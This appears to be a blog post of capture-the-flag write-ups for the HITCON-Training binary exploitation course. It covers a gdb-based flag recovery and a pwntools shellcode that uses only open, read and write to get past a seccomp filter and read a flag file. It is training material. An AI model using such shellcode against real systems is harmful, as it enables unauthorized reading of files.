wtf

WTF is white tight feet.

  1. 1. HITCON-Training
    1. 1.1. Environment Setup
    2. 1.2. Outline
    3. 1.3. write up
    4. 1.4. LAB 1 [sysmagic]
    5. 1.5. LAB 2 [orw.bin]
      1. 1.5.1. syscall : shellcode

HITCON-Training

For Linux binary Exploitation

Environment Setup

git clone https://github.com/scwuaptx/HITCON-Training.git ~/
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh

Outline

  • Basic Knowledge

    • Introduction
      • Reverse Engineering
        • Static Analysis
        • Dynamic Analysis
      • Exploitation
      • Useful Tool
        • IDA PRO
        • GDB
        • Pwntool
      • lab 1 - sysmagic
    • Section
    • Compile,linking,assmbler
    • Execution
      • how program get run
      • Segment
    • x86 assembly
      • Calling convention
      • lab 2 - open/read/write
      • shellcoding
  • Stack Overflow

    • Buffer Overflow
    • Return to Text/Shellcode
      • lab 3 - ret2shellcode
    • Protection
      • ASLR/DEP/PIE/StackGuard
    • Lazy binding
    • Return to Library
      • lab 4 - ret2lib
  • Return Oriented Programming

    • ROP
      • lab 5 - simple rop
    • Using ROP bypass ASLR
      • ret2plt
    • Stack migration
      • lab 6 - migration
  • Format String Attack

    • Format String
    • Read from arbitrary memory
      • lab 7 - crack
    • Write to arbitrary memory
      • lab 8 - craxme
    • Advanced Trick
      • EBP chain
      • lab 9 - playfmt
  • x64 Binary Exploitation

    • x64 assembly
    • ROP
    • Format string Attack
  • Heap exploitation

    • Glibc memory allocator overview
    • Vulnerablility on heap
      • Use after free
        • lab 10 - hacknote
      • Heap overflow
        • house of force
          • lab 11 - 1 - bamboobox1
        • unlink
          • lab 11 - 2 - bamboobox2
  • Advanced heap exploitation

    • Fastbin attack
      • lab 12 - babysecretgarden
    • Shrink the chunk
    • Extend the chunk
      • lab 13 - heapcreator
    • Unsortbin attack
      • lab 14 - magicheap
  • C++ Exploitation

    • Name Mangling
    • Vtable fucntion table
    • Vector & String
    • New & delete
    • Copy constructor & assignment operator
      • lab 15 - zoo
  • 那些 Pwning 的奇淫技巧:

write up

LAB 1 [sysmagic]

简单的 Symbolic Execution

反编译发现输入buf == v2,buf是随机数,可以直接gdb调试。

1
2
3
4
5
6
if ( buf == v2 )
// 0x8048720 <get_flag+389> cmp edx, eax
{
for ( i = 0; i <= 0x30; ++i )
putchar(v5[i] ^ v6[i + 1]);
}

断点 0x08048712 <+375>: call 0x8048480 <__isoc99_scanf@plt>,然后随便输入一个值,

1
2
3
4
5
6
7
8
9
pwndbg> b *get_flag+375
Breakpoint 1 at 0x8048712
pwndbg> set $eax=$edx
pwndbg> b *get_flag+471
Note: breakpoint 2 also set at pc 0x8048772.
Breakpoint 3 at 0x8048772
pwndbg> c
Continuing.
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

其实我在想另一种方法,就是既然变量都在程序里,我们也可以手动计算。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#include<stdio.h>
main() {
char v5[0x80];
char buf[0x80] = "BDo_you_know_why_my_teammate_Orange_is_so_angry???";
int i;
v5[0] = 7;
v5[1] = 59;
v5[2] = 25;
v5[3] = 2;
v5[4] = 11;
v5[5] = 16;
v5[6] = 61;
v5[7] = 30;
v5[8] = 9;
v5[9] = 8;
v5[10] = 18;
v5[11] = 45;
v5[12] = 40;
v5[13] = 89;
v5[14] = 10;
v5[15] = 0;
v5[16] = 30;
v5[17] = 22;
v5[18] = 0;
v5[19] = 4;
v5[20] = 85;
v5[21] = 22;
v5[22] = 8;
v5[23] = 31;
v5[24] = 7;
v5[25] = 1;
v5[26] = 9;
v5[27] = 0;
v5[28] = 126;
v5[29] = 28;
v5[30] = 62;
v5[31] = 10;
v5[32] = 30;
v5[33] = 11;
v5[34] = 107;
v5[35] = 4;
v5[36] = 66;
v5[37] = 60;
v5[38] = 44;
v5[39] = 91;
v5[40] = 49;
v5[41] = 85;
v5[42] = 2;
v5[43] = 30;
v5[44] = 33;
v5[45] = 16;
v5[46] = 76;
v5[47] = 30;
v5[48] = 0x42;
for ( i = 0; i <= 0x30; ++i )
putchar(v5[i] ^ buf[i + 1]);
}
1
2
sb@xulun:~/pwn/HITCON-Training/LAB/lab1$ ./calc 
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

LAB 2 [orw.bin]

syscall : shellcode

跟pwnable.tw的orw应该是同一题,翻了翻互联网的wp,记录一下。

1
Only open read write syscall are allowed to use.

main

1
2
3
4
5
6
7
8
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}

orw_seccomp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned int orw_seccomp()
{
__int16 v1; // [esp+4h] [ebp-84h] BYREF
char *v2; // [esp+8h] [ebp-80h]
char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
unsigned int v4; // [esp+6Ch] [ebp-1Ch]

v4 = __readgsdword(0x14u);
qmemcpy(v3, &unk_8048640, sizeof(v3));
v1 = 12;
v2 = v3;
prctl(38, 1, 0, 0, 0);
prctl(22, 2, &v1);
return __readgsdword(0x14u) ^ v4;
}

关注prctl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define PR_SET_SECCOMP	22
/*
* If no_new_privs is set, then operations that grant new privileges (i.e.
* execve) will either fail or not grant them. This affects suid/sgid,
* file capabilities, and LSMs.
*
* Operations that merely manipulate or drop existing privileges (setresuid,
* capset, etc.) will still work. Drop those privileges if you want them gone.
*
* Changing LSM security domain is considered a new privilege. So, for example,
* asking selinux for a specific new context (e.g. with runcon) will result
* in execve returning -EPERM.
*/
#define PR_SET_NO_NEW_PRIVS 38
prctl(PR_SET_NO_NEW_PRIVS, 1);// use the SECCOMP_SET_MODE_FILTER operation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sb@xulun:~/pwn/HITCON-Training/LAB/lab2$ seccomp-tools dump ./orw
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW

系统过滤,系统调用函数中只有open,read,write能够进入下一步。

参考一个师傅的做法,首先使用open打开flag,然后用read读取flag,最后通过stdout输出到屏幕。

1
2
3
int fd = sys_open("/home/orw/flag");
sys_read(fd, flag, 0x30);
sys_write(1, flag, 0x30);
1
2
3
.bss:0804A060                 public shellcode
.bss:0804A060 shellcode db ? ; ; CODE XREF: main+42↑p
.bss:0804A060 ; DATA XREF: main+2E↑o ...
1
2
3
4
5
6
该师傅的
栈布局:
shellcode at (.bss) 0x0804A060
code at shellcode+0x0, data at shellcode+0x80(0x0804A0E0)
data+0x0 : /home/orw/flag
data+0x20 : [flag]

我的观察:

1
2
3
4
read正下方的一些指令
add esp,0x10
mov eax,0x804a060 # shellcode
call eax

eax作为返回值,当我们传入open(path)返回的文件描述符(见pwnable.kr的fd),一个FILE流的句柄,可以有该句柄读入到另一个寄存器(edi还是esp都可以,我们只是需要一个地址去存放)。

1
2
3
4
5
6
7
shellcode =  ''
# flag file open
shellcode += shellcraft.open('/home/orw/flag')
# read -> input
shellcode += shellcraft.read('eax', 'edi', 100)
# write -> output
shellcode += shellcraft.write(1, 'edi', 100)

对于汇编的知识,

本文作者 : wtfff
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-SA 4.0)进行许可。This blog is under a CC BY-NC-SA 4.0 Unported License
本文链接 : http://im0use.github.io/2022/06/08/hitcon-train/

本文最后更新于 天前,文中所描述的信息可能已发生改变